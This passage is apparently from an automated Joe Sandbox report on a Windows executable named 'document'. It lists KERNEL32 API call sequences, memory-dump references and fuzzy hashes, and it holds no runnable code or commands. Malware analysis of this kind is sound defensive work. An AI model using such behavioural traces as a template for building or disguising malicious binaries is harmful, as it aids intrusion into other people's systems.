                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
                                                                  • API String ID: 2635119114-282957996
                                                                  • Opcode ID: b87ad60a131d164c28d5f70f0fad35323593ccf2417c63438c26ed16432ab973
                                                                  • Instruction ID: 86349d13d9d697d1a2059cccb8833edb385c7957e5e4b5f87f3c94e81b02547f
                                                                  • Opcode Fuzzy Hash: b87ad60a131d164c28d5f70f0fad35323593ccf2417c63438c26ed16432ab973
                                                                  • Instruction Fuzzy Hash: 1B2180707042619AD724AF37BE09A667FB5EB467103A1113BF644C32A0DBB8840ACF6C
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,-00000023,?,00000023), ref: 0041B170
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041B284
                                                                    • Part of subcall function 0041AD70: lstrlenA.KERNEL32 ref: 0041ADCA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($*$0$F$I$Y$[$b$n$p$r$x
                                                                  • API String ID: 1659193697-2061847989
                                                                  • Opcode ID: 0aacacd1b8cdbe4c7b6c9d18da774663ceb4049ca215048843e45ef287c2fd62
                                                                  • Instruction ID: 2df139c3096c9c4d925bdfeecfd17c6d27e21bb7b6dfed262cfb59e6470ea8b3
                                                                  • Opcode Fuzzy Hash: 0aacacd1b8cdbe4c7b6c9d18da774663ceb4049ca215048843e45ef287c2fd62
                                                                  • Instruction Fuzzy Hash: 76A13A2110C7C28AC322DA3C589859FBFD55EA7228F480B9EF0E5472E2C7558549C7AB
                                                                  APIs
                                                                    • Part of subcall function 00401000: ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 004010E1
                                                                    • Part of subcall function 00401000: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004010FB
                                                                  • CreateThread.KERNEL32(00000000,00000000,004158B0,?,00000000,?), ref: 00401292
                                                                  • CreateThread.KERNEL32(00000000,00000000,00406580,?,00000000,?), ref: 004012AC
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004012BA
                                                                  • CreateThread.KERNEL32(00000000,00000000,0041C0F0,?,00000000,?), ref: 004012E0
                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,000000FF), ref: 004012FF
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040BB70,?,00000000,?), ref: 00401324
                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,000000FF), ref: 0040133F
                                                                  • CloseHandle.KERNEL32(?), ref: 00401348
                                                                  • SetEvent.KERNEL32(?), ref: 0040135A
                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,00000000,00000001), ref: 00401388
                                                                  • CloseHandle.KERNEL32(00000001), ref: 0040138F
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013A0
                                                                  • CloseHandle.KERNEL32(?), ref: 004013AB
                                                                  • SetEvent.KERNEL32 ref: 004013B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Create$ThreadWait$CloseEventHandle$MultipleObjectObjectsSingle$EnvironmentExpandFileStrings
                                                                  • String ID:
                                                                  • API String ID: 94205885-0
                                                                  • Opcode ID: f714fd7dc9cf1b848fcbf6baa3b872f43579e6a1c41cad7c9b60e9636e7f0812
                                                                  • Instruction ID: 109f3496b703d5c848b0bbf75510f44b12918ce008f531d148e58f88355e5c24
                                                                  • Opcode Fuzzy Hash: f714fd7dc9cf1b848fcbf6baa3b872f43579e6a1c41cad7c9b60e9636e7f0812
                                                                  • Instruction Fuzzy Hash: 8E414F71244301AFE320DB65CC86F7BB3E8ABC8B14F504A2DF695A72D0DA74E8458B59
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll,0042E5E8,?,?), ref: 0042ADE9
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0042AE05
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042AE16
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042AE23
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0042AE39
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042AE4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-1612076079
                                                                  • Opcode ID: 1e07f3a9dedf5d83c3b40c4b76d854943183329d44e916a5c801173aea8fc7a5
                                                                  • Instruction ID: 70b5fa524dff6b7417458b24b0bac14766b51569b5ba9c55d5771b2b321c63c1
                                                                  • Opcode Fuzzy Hash: 1e07f3a9dedf5d83c3b40c4b76d854943183329d44e916a5c801173aea8fc7a5
                                                                  • Instruction Fuzzy Hash: 6B21A730740326ABDB119F75BE84B6B3BE8AB04740B51143BED01D6190D7BCC81ADB6E
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,74DE8A60,00406532,?, :\,?,?,?), ref: 00406275
                                                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406292
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040629F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile$CloseHandleMapping
                                                                  • String ID:
                                                                  • API String ID: 2353530451-0
                                                                  • Opcode ID: 090e925647e629e1d9fdd77bcff8ee2c0cad40d50ae18b26d1d138ae1d50bb0b
                                                                  • Instruction ID: b1713de03d30712edf461a6f0e0af24326c7c5dfdbc2b318762e316791e25a2b
                                                                  • Opcode Fuzzy Hash: 090e925647e629e1d9fdd77bcff8ee2c0cad40d50ae18b26d1d138ae1d50bb0b
                                                                  • Instruction Fuzzy Hash: 7A21F4313892246AF230673ABC49FDB3B988B86730F511036F750E22E1DAB46806966D
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0041F84E
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F851
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0041F860
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F863
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0041F872
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F875
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F884
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F88D
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F896
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F89F
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F8A8
                                                                  • SetEvent.KERNEL32(?), ref: 0041F8BB
                                                                  • Sleep.KERNEL32(000003E8), ref: 0041F8C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseHandle$FreeProcess$EventSleep
                                                                  • String ID:
                                                                  • API String ID: 2749338665-0
                                                                  • Opcode ID: 9c1348228d7dc5c2962a96d715c005febc0d8f4a9507fb5608177c5e893bdc25
                                                                  • Instruction ID: 76c645c424173bd840e30338d02661637eb24344bf89ff37b7fb3177c525ef51
                                                                  • Opcode Fuzzy Hash: 9c1348228d7dc5c2962a96d715c005febc0d8f4a9507fb5608177c5e893bdc25
                                                                  • Instruction Fuzzy Hash: 2D11BA71300704ABE620ABBADC84FEBF3ECAF98751F05492AE559C7250CA74F8418A64
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0042EB1C,00000001,00000000,00000000,0042EB20,00000038,0042B0F7,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0042A04E
                                                                  • GetLastError.KERNEL32 ref: 0042A060
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0042B335,?,00000000,00000000,0042EB20,00000038,0042B0F7,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0042A0E7
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0042B335,?,?,00000000), ref: 0042A168
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0042A182
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 0042A1BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1775797328-0
                                                                  • Opcode ID: 4aa49757b57a5304e3d7957d6244e3b008b81b7b30d59c19cfa7548b89e7cf8c
                                                                  • Instruction ID: 3988559e70c465a35b60d6fc3080959d3b10041c74b9751cd7113821b118c49c
                                                                  • Opcode Fuzzy Hash: 4aa49757b57a5304e3d7957d6244e3b008b81b7b30d59c19cfa7548b89e7cf8c
                                                                  • Instruction Fuzzy Hash: 5FB18472A00129EFCF219FA1EC849EE7B75FF08354F54412AFD11A2260D7398D61DB6A
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,00000001,00000001,00000000,00000003,00000000,00000000,74DF2EE0,00000001,00000000,004123D8,?,?,?), ref: 0041DF78
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041DF88
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041DF95
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 0041DFAB
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041DFAE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041DFBB
                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041DFE0
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041E013
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041E024
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041E02F
                                                                  • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0041E032
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$File$Process$AllocCreateFreeReadSize
                                                                  • String ID:
                                                                  • API String ID: 851827180-0
                                                                  • Opcode ID: 60d014867e17b0a3a17904d24a01199ccef4cdd3278f6ba1154e53a9580f930a
                                                                  • Instruction ID: e2e57060ce1e7308e866bc93ed0c156a6316686fabef653f62ff15feab7bbeed
                                                                  • Opcode Fuzzy Hash: 60d014867e17b0a3a17904d24a01199ccef4cdd3278f6ba1154e53a9580f930a
                                                                  • Instruction Fuzzy Hash: 124191753052109FD7208F69EC85BB67BE8EB8A721F10143AF581C72A1D7B594478B2D
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 0041AD0A
                                                                    • Part of subcall function 0041BC30: WaitForSingleObject.KERNEL32(?,?), ref: 0041BCA3
                                                                    • Part of subcall function 0041BC30: GetOverlappedResult.KERNEL32(000000FF,?,00000001,00000000), ref: 0041BCB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectOverlappedResultSingleWaitlstrlen
                                                                  • String ID: #$&$($/$5$@$`$c$e$n
                                                                  • API String ID: 1203007601-276966957
                                                                  • Opcode ID: 243c376249be2b182f6dacd44d2a29b8c8a9c47cc2e434e317091e12bd14b117
                                                                  • Instruction ID: 40db77f959c89022b5c68d7f606fb1fae4f3f0c1390896a0b38eb06e05df56be
                                                                  • Opcode Fuzzy Hash: 243c376249be2b182f6dacd44d2a29b8c8a9c47cc2e434e317091e12bd14b117
                                                                  • Instruction Fuzzy Hash: 0A31A17210C3C18AD311DA28D80479BBBD59BD6318F044A6EF5D48B2D2D7B99658C3EB
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000,?), ref: 004156BD
                                                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 004156DE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004156EF
                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,74DE8A60), ref: 00415717
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041573C
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00415763
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$Create$MappingView
                                                                  • String ID:
                                                                  • API String ID: 3943831188-0
                                                                  • Opcode ID: 787c517364cca91a25c3f6c6ae074f02f0c4f93847fde26aceba2bb5773ca060
                                                                  • Instruction ID: eb472704c8537460521009dc0dce809b9dfd64f6dddd53decf9b69cebded8fb2
                                                                  • Opcode Fuzzy Hash: 787c517364cca91a25c3f6c6ae074f02f0c4f93847fde26aceba2bb5773ca060
                                                                  • Instruction Fuzzy Hash: 97513D352043909BD321EB3AEC927DBBBD5ABCA310F54543AE9C4973B2C6B69405CB1D
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(?,?,00000001), ref: 00414F58
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00414F96
                                                                  • CloseHandle.KERNEL32(?), ref: 00414FA6
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414FB7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00414FBA
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00414FD2
                                                                  • HeapFree.KERNEL32(00000000), ref: 00414FDB
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00414FE4
                                                                  • HeapFree.KERNEL32(00000000), ref: 00414FE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseHandle$FreeObjectProcessSingleWait
                                                                  • String ID:
                                                                  • API String ID: 2579758194-0
                                                                  • Opcode ID: 5cb114ee75c73d9d28095b093425758b0f491e95b005c264dc94f0b4429a9c47
                                                                  • Instruction ID: 966a43781993c991ec9a06a83fdc448c25b6a2ab2b61fe85e3c188c58705bdba
                                                                  • Opcode Fuzzy Hash: 5cb114ee75c73d9d28095b093425758b0f491e95b005c264dc94f0b4429a9c47
                                                                  • Instruction Fuzzy Hash: EB21A2351083809BC225EB69DC41BABBBE8AFD9714F44161EE5A8433D1CB746805CB2B
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,00000000), ref: 0040B13C
